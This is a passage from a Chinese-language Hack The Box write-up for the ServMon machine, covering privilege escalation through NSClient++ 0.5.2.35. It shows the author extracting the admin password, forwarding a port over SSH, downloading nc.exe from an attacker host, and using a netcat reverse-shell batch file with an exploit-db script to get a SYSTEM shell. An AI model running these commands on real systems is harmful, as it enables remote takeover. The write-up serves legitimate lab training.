-a----        11/5/2017  10:04 PM          18351 license.txt
-a----        10/5/2017   7:19 AM         203264 lua.dll
-a----        4/10/2020   6:32 PM           2683 nsclient.ini
-a----        3/17/2024   4:27 AM          42608 nsclient.log
-a----        11/5/2017   9:42 PM          55808 NSCP.Core.dll
-a----        1/28/2018  10:32 PM        4765208 nscp.exe
-a----        11/5/2017   9:42 PM         483328 NSCP.Protobuf.dll
-a----       11/19/2017   4:18 PM         534016 nscp_json_pb.dll
-a----       11/19/2017   3:55 PM        2090496 nscp_lua_pb.dll
-a----        1/23/2018   8:57 PM         507904 nscp_mongoose.dll
-a----       11/19/2017   3:49 PM        2658304 nscp_protobuf.dll
-a----        11/5/2017  10:04 PM           3921 old-settings.map
-a----        1/28/2018  10:21 PM        1973760 plugin_api.dll
-a----        5/23/2015   8:44 AM        3017216 python27.dll
-a----        9/27/2015   3:42 PM       28923515 python27.zip
-a----        1/28/2018  10:34 PM         384536 reporter.exe
-a----        12/8/2015  11:16 PM         348160 ssleay32.dll
-a----        5/23/2015   8:44 AM         689664 unicodedata.pyd
-a----        11/5/2017   9:20 PM        1273856 where_filter.dll
-a----        5/23/2015   8:44 AM          47616 _socket.pyd


PS C:\Program Files\NSClient++> type nsclient.ini
# If you want to fill this file with all available options run the following command: 
#   nscp settings --generate --add-defaults --load-all
# If you want to activate a module and bring in all its options use:
#   nscp settings --activate-module <MODULE NAME> --add-defaults
# For details run: nscp settings --help


; in flight - TODO
[/settings/default]

; Undocumented key
password = ew2x6SsGTxjRwXOT

; Undocumented key
allowed hosts = 127.0.0.1


; in flight - TODO
[/settings/NRPE/server] 

; Undocumented key
ssl options = no-sslv2,no-sslv3

; Undocumented key
verify mode = peer-cert

; Undocumented key
insecure = false


; in flight - TODO
[/modules]

; Undocumented key
CheckHelpers = disabled

; Undocumented key
CheckEventLog = disabled

; Undocumented key
CheckNSCP = disabled

; Undocumented key
CheckDisk = disabled

; Undocumented key
CheckSystem = disabled

; Undocumented key 
WEBServer = enabled

; Undocumented key
NRPEServer = enabled

; CheckTaskSched - Check status of your scheduled jobs.
CheckTaskSched = enabled

; Scheduler - Use this to schedule check commands and jobs in conjunction with for instance passive monitoring throu
gh NSCA
Scheduler = enabled

; CheckExternalScripts - Module used to execute external scripts
CheckExternalScripts = enabled


; Script wrappings - A list of templates for defining script commands. Enter any command line here and they will be 
expanded by scripts placed under the wrapped scripts section. %SCRIPT% will be replaced by the actual script an %ARG
S% will be replaced by any given arguments.
[/settings/external scripts/wrappings]

; Batch file - Command used for executing wrapped batch files
bat = scripts\\%SCRIPT% %ARGS%

; Visual basic script - Command line used for wrapped vbs scripts
vbs = cscript.exe //T:30 //NoLogo scripts\\lib\\wrapper.vbs %SCRIPT% %ARGS%

; POWERSHELL WRAPPING - Command line used for executing wrapped ps1 (powershell) scripts
ps1 = cmd /c echo If (-Not (Test-Path "scripts\%SCRIPT%") ) { Write-Host "UNKNOWN: Script `"%SCRIPT%`" not found."; 
exit(3) }; scripts\%SCRIPT% $ARGS$; exit($lastexitcode) | powershell.exe /noprofile -command -


; External scripts - A list of scripts available to run from the CheckExternalScripts module. Syntax is: `command=sc
ript arguments`
[/settings/external scripts/scripts]


; Schedules - Section for the Scheduler module.
[/settings/scheduler/schedules]

; Undocumented key
foobar = command = foobar


; External script settings - General settings for the external scripts module (CheckExternalScripts).
[/settings/external scripts]
allow arguments = true
PS C:\Program Files\NSClient++>

16、然后我们继续分析查看下这个软件的版本信息

PS C:\Program Files\NSClient++> dir 


    Directory: C:\Program Files\NSClient++


Mode                LastWriteTime         Length Name                                                              
----                -------------         ------ ----
d-----        3/17/2024   4:53 AM                crash-dumps
d-----        2/28/2022   6:55 PM                modules
d-----        2/28/2022   6:55 PM                scripts
d-----        2/28/2022   6:55 PM                security
d-----        2/28/2022   6:55 PM                web
-a----        12/9/2015  12:17 AM          28672 boost_chrono-vc110-mt-1_58.dll
-a----        12/9/2015  12:17 AM          50688 boost_date_time-vc110-mt-1_58.dll
-a----        12/9/2015  12:17 AM         117760 boost_filesystem-vc110-mt-1_58.dll
-a----        12/9/2015  12:22 AM         439296 boost_program_options-vc110-mt-1_58.dll
-a----        12/9/2015  12:23 AM         256000 boost_python-vc110-mt-1_58.dll
-a----        12/9/2015  12:17 AM         765952 boost_regex-vc110-mt-1_58.dll
-a----        12/9/2015  12:16 AM          19456 boost_system-vc110-mt-1_58.dll
-a----        12/9/2015  12:18 AM         102400 boost_thread-vc110-mt-1_58.dll
-a----        1/14/2020   1:24 PM             51 boot.ini
-a----        1/18/2018   3:51 PM         157453 changelog.txt
-a----        1/28/2018  10:33 PM        1210392 check_nrpe.exe
-a----        12/8/2015  11:16 PM        1655808 libeay32.dll
-a----        11/5/2017  10:04 PM          18351 license.txt
-a----        10/5/2017   7:19 AM         203264 lua.dll
-a----        4/10/2020   6:32 PM           2683 nsclient.ini
-a----        3/17/2024   4:53 AM          42946 nsclient.log
-a----        11/5/2017   9:42 PM          55808 NSCP.Core.dll
-a----        1/28/2018  10:32 PM        4765208 nscp.exe
-a----        11/5/2017   9:42 PM         483328 NSCP.Protobuf.dll
-a----       11/19/2017   4:18 PM         534016 nscp_json_pb.dll
-a----       11/19/2017   3:55 PM        2090496 nscp_lua_pb.dll
-a----        1/23/2018   8:57 PM         507904 nscp_mongoose.dll
-a----       11/19/2017   3:49 PM        2658304 nscp_protobuf.dll
-a----        11/5/2017  10:04 PM           3921 old-settings.map
-a----        1/28/2018  10:21 PM        1973760 plugin_api.dll
-a----        5/23/2015   8:44 AM        3017216 python27.dll
-a----        9/27/2015   3:42 PM       28923515 python27.zip
-a----        1/28/2018  10:34 PM         384536 reporter.exe
-a----        12/8/2015  11:16 PM         348160 ssleay32.dll
-a----        5/23/2015   8:44 AM         689664 unicodedata.pyd
-a----        11/5/2017   9:20 PM        1273856 where_filter.dll
-a----        5/23/2015   8:44 AM          47616 _socket.pyd


PS C:\Program Files\NSClient++> .\nscp.exe
Usage: nscp <context> 
  The <context> is the mode of operation ie. a type of command.  
You can also use aliases here which are shorthands for 'nscp client --module <plugin>'
  Available context are:  
    client
      Act as a client. This will run commands inside various installed modules and scripts. 

    help
      Display the help screen. 

    service
      Install/uninstall/display NSCP service. 

    settings
      Change and list settings as well as load and initialize modules. 

    unit
      Run unit test scripts. 

  Available aliases are:
    check_mk   (same as nscp client --module CheckMKClient) 
      Use a check_mk (the protocol) client to request information from other systems via check_mk. 

    eventlog   (same as nscp client --module CheckEventLog)
      Inject event log message into the eventlog (mainly for testing eventlog filtering and setup) 

    ext   (same as nscp client --module CheckExternalScripts) 
      TODO: describe: ext

    ext-scr   (same as nscp client --module CheckExternalScripts) 
      TODO: describe: ext-scr 

    lua   (same as nscp client --module LUAScript) 
      Execute lua scripts

    mk   (same as nscp client --module CheckMKClient) 
      Use a check_mk (the protocol) client to request information from other systems via check_mk. 

    nrpe   (same as nscp client --module NRPEClient) 
      Use a NRPE client to request information from other systems via NRPE similar to standard NRPE check_nrpe comma
nd.

    nsca   (same as nscp client --module NSCAClient)
      Use a NSCA to submit passive checks to a remote system. Similar to the send_nsca command 

    nscp   (same as nscp client --module NSCPClient) 
      Use a NSCP (the protocol) client to request information from other systems via NSCP. 

    op5   (same as nscp client --module Op5Client) 
      TODO: describe: op5 

      Execute python scripts

    python   (same as nscp client --module PythonScript)
      Execute python scripts

    sys   (same as nscp client --module CheckSystem)
      Various system tools to get information about the system (generally PDH on windows curretly)

    syslog   (same as nscp client --module SyslogClient)
      Use SYSLOG (the protocol) to submit messages to a remote system.

    test   (same as nscp client --module CommandClient)
      The best way to diagnose and find errors with your configuration and setup.

    web   (same as nscp client --module WEBServer)
      TODO: describe: web
 
    wmi   (same as nscp client --module CheckWMI)
      Run WMI queries from command line

  A short list of all available contexts are:
client, help, service, settings, unit, check_mk, eventlog, ext, ext-scr, lua, mk, nrpe, nsca, nscp, op5, py, python,
 sys, syslog, test, web, wmi
PS C:\Program Files\NSClient++> .\nscp.exe help
Allowed options: 

Common options:
  --settings arg                Override (temporarily) settings subsystem to
                                use 
  --debug                       Set log level to debug (and show debug
                                information) 
  --log arg                     The log level to use
  --define arg                  Defines to use to override settings. Syntax is  
                                PATH:KEY=VALUE

Common options:
  --help                        Show the help message for a given command 
  --no-stderr                   Do not report errors on stderr 
  --version                     Show version information

Service Options:
  --install                     Install service
  --uninstall                   Uninstall service
  --start                       Start service
  --stop                        Stop service
  --restart                     Stop than start service 
  --info                        Show information about service 
  --run                         Run as a service
  --name arg                    Name of service 
  --description arg             Description of service

Settings options:
  --migrate-to arg              Migrate (copy) settings from current store to  
                                given target store 
  --migrate-from arg            Migrate (copy) settings from old given store to
                                current store 
  --generate [=arg(=settings)]  Add comments to the current settings store (or  
                                a given one).
  --add-missing                 Add all default values for all missing keys. 
  --validate                    Validate the current configuration (or a given  
                                configuration).
  --load-all                    Load all plugins (currently only used with
                                generate). 
  --path arg                    Path of key to work with.
  --key arg                     Key to work with. 
  --set arg                     Set a key and path to a given value (use --key
                                and --path). 
  --switch arg                  Set default context to use (similar to migrate  
                                but does NOT copy values)
  --show                        Show a value given a key and path. 
  --list                        List all keys given a path. 
  --add-defaults                Same as --add-missing 
  --remove-defaults             Remove all keys which have default values (and  
  --use-samples                 Add sample commands provided by some sections
                                such as targets and real time filters
  --activate-module arg         Add a module (and its configuration options) to
                                the configuration.

Client Options:
  --load-all                    Load all plugins.
  -e [ --exec ] arg             Run a command (execute)
  -b [ --boot ]                 Boot the client before executing command
                                (similar as running the command from test mode)
  -q [ --query ] arg            Run a query with a given name
  -s [ --submit ] arg           Submit passive check result
  -M [ --module ] arg           Load specific module (in other words do not
                                auto detect module)
  -a [ --argument ] arg         List of arguments (arguments gets -- prefixed
                                automatically (--argument foo=bar is the same
                                as setting "--foo bar")
  --raw-argument arg            List of arguments (does not get -- prefixed)


First argument has to be one of the following: client, help, service, settings, unit,
Or on of the following client aliases: check_mk, eventlog, ext, ext-scr, lua, mk, nrpe, nsca, nscp, op5, py, python,
 sys, syslog, test, web, wmi,
PS C:\Program Files\NSClient++> .\nscp.exe --version
NSClient++, Version: 0.5.2.35 2018-01-28, Platform: x64
PS C:\Program Files\NSClient++>  

17、经过搜集，我们发现了漏洞信息

NSClient++ 0.5.2.35

https://www.exploit-db.com/exploits/46802

18、这里发现可以直接通过软件获取到密码 = =！

PS C:\Program Files\NSClient++> .\nscp.exe web -- password --display
Current password: ew2x6SsGTxjRwXOT
PS C:\Program Files\NSClient++>  

19、这里存在一个问题，就是我们密码是正确的，但是登录系统的时候一直登录不上

https://10.10.10.184:8443/index.html#/

20、回想前期的枚举过程，突然想到应该是配置限制了，果然是

; Undocumented key
allowed hosts = 127.0.0.1

21、由于这里存在端口限制，需要通过ssh把端口给转发出来，这里使用了SSH的本地转发，并结合sshpass 工具使用。

┌──(kali㉿offsec)-[~/Desktop]
└─$ sshpass -p 'L1k3B1gBut7s@W0rk' ssh nadine@10.10.10.184 -L 8443:127.0.0.1:8443


Microsoft Windows [Version 10.0.17763.864]
(c) 2018 Microsoft Corporation. All rights reserved.

nadine@SERVMON C:\Users\Nadine>

22、端口转发后，是可以正常访问的，就是有些卡，然后，这里原本我是想手动进行获取反弹shell的

下载nc和执行bat脚本工具

PS C:\> mkdir temp


    Directory: C:\

 
----                -------------         ------ ----
d-----        3/17/2024   5:27 AM                temp


PS C:\> dir


    Directory: C:\


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----        3/17/2024   3:36 AM                inetpub
d-----        9/15/2018  12:19 AM                PerfLogs
d-r---        2/28/2022   6:55 PM                Program Files
d-----        2/28/2022   6:07 PM                Program Files (x86)
d-----        2/28/2022   7:02 PM                RecData
d-----        2/28/2022   6:35 PM                Shared
d-----        3/17/2024   5:27 AM                temp
d-r---        2/28/2022   7:04 PM                Users
d-----        2/28/2022   6:02 PM                Windows


PS C:\> iwr -uri http://10.10.14.11:8000/nc.exe -Outfile C:\temp\nc.exe
PS C:\>

iwr -uri http://10.10.14.11:8000/evil.bat -Outfile C:\temp\evil.bat


PS C:\> cd .\temp\
PS C:\temp> dir


    Directory: C:\temp


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        3/17/2024   5:27 AM          68608 nc.exe


PS C:\temp> iwr -uri http://10.10.14.11:8000/evil.bat -Outfile C:\temp\evil.bat
PS C:\temp> dir


    Directory: C:\temp


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        3/17/2024   5:29 AM             52 evil.bat
-a----        3/17/2024   5:27 AM          68608 nc.exe


PS C:\temp>

PS C:\temp> type .\evil.bat
@echo off 
C:\temp\nc.exe 10.10.14.11 443 -e cmd.exe
PS C:\temp>

9. Add script foobar to call evil.bat and save settings
- Settings > External Scripts > Scripts
- Add New
	- foobar
		command = c:\temp\evil.bat



10-11. Add schedulede to call script every 1 minute and save settings
- Settings > Scheduler > Schedules
- Add new
	- foobar
		interval = 1m
		command = foobar

23、各种操作下来，都是错误，没办法，我只能使用另一个脚本了

https://www.exploit-db.com/exploits/48360

24、直接利用获取反弹shell

┌──(kali㉿offsec)-[~/Desktop]
└─$ python3 48360.py -t 127.0.0.1 -P 8443 -p ew2x6SsGTxjRwXOT -c 'C:\temp\nc.exe 10.10.14.11 443 -e cmd.exe'
[!] Targeting base URL https://127.0.0.1:8443
[!] Obtaining Authentication Token . . .
[+] Got auth token: F69AzBlax3CF3EDNhm3soLBPh71Yexui
[!] Enabling External Scripts Module . . .
[!] Configuring Script with Specified Payload . . .
[+] Added External Script (name: BJWoaXioB)
[!] Saving Configuration . . .
[!] Reloading Application . . .
[!] Waiting for Application to reload . . .
[!] Obtaining Authentication Token . . .
[+] Got auth token: frAQBc8Wsa1xVPfvJcrgRYwTiizs2trQ
[!] Triggering payload, should execute shortly . . .
[!] Timeout exceeded. Assuming your payload executed . . .


┌──(kali㉿offsec)-[~/Desktop]
└─$ nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.14.11] from (UNKNOWN) [10.10.10.184] 51188
Microsoft Windows [Version 10.0.17763.864]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Program Files\NSClient++>whoami
whoami
nt authority\system

C:\Program Files\NSClient++>

25、获取最终的flag信息

C:\Program Files\NSClient++>cd C:/Users/Administrator
cd C:/Users/Administrator

C:\Users\Administrator>cd Desktop
cd Desktop

C:\Users\Administrator\Desktop>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 20C1-47A1

 Directory of C:\Users\Administrator\Desktop

02/28/2022  07:56 PM    <DIR>          .
02/28/2022  07:56 PM    <DIR>          ..
03/17/2024  03:29 AM                34 root.txt
               1 File(s)             34 bytes
               2 Dir(s)   6,095,605,760 bytes free

C:\Users\Administrator\Desktop>type root.txt
type root.txt
b76c8640f3363d576d50ffb7da187ba1

C:\Users\Administrator\Desktop>

0x03 通关凭证展示

https://www.hackthebox.com/achievement/machine/1705469/240